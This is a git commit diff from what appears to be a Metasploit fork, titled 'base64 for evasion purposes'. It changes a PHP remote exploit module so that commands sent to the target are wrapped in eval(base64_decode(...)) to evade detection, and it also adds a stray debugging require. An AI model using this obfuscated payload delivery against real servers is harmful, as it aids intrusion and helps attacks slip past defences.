base64 for evasion purposes

bug/bundler_fix
nixawk 2015-11-03 06:42:52 +00:00
parent 6c16d2a1ca
commit 46fe0c0899
1 changed files with 3 additions and 1 deletions

View File

@ -5,6 +5,7 @@
## ##
require 'msf/core' require 'msf/core'
require 'pry'
class Metasploit4 < Msf::Exploit::Remote class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
@ -26,7 +27,7 @@ class Metasploit4 < Msf::Exploit::Remote
], ],
'Payload' => 'Payload' =>
{ {
'BadChars' => '\x00', 'BadChars' => '\x00'
}, },
'Platform' => ['php'], 'Platform' => ['php'],
'Arch' => ARCH_PHP, 'Arch' => ARCH_PHP,
@ -46,6 +47,7 @@ class Metasploit4 < Msf::Exploit::Remote
end end
def http_send_command(code) def http_send_command(code)
code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));"
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(target_uri.path), 'uri' => normalize_uri(target_uri.path),